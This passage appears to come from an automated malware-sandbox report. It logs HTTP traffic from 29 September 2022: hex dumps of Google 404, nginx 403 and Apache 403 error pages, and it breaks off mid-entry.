69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 13:00:22 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 13:00:22 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 13:00:56 GMTServer: Apache/2.4.38 (Debian)Content-Length: 278Keep-Alive: timeout=1, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 37 38 2e 31 35 39 2e 39 37 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 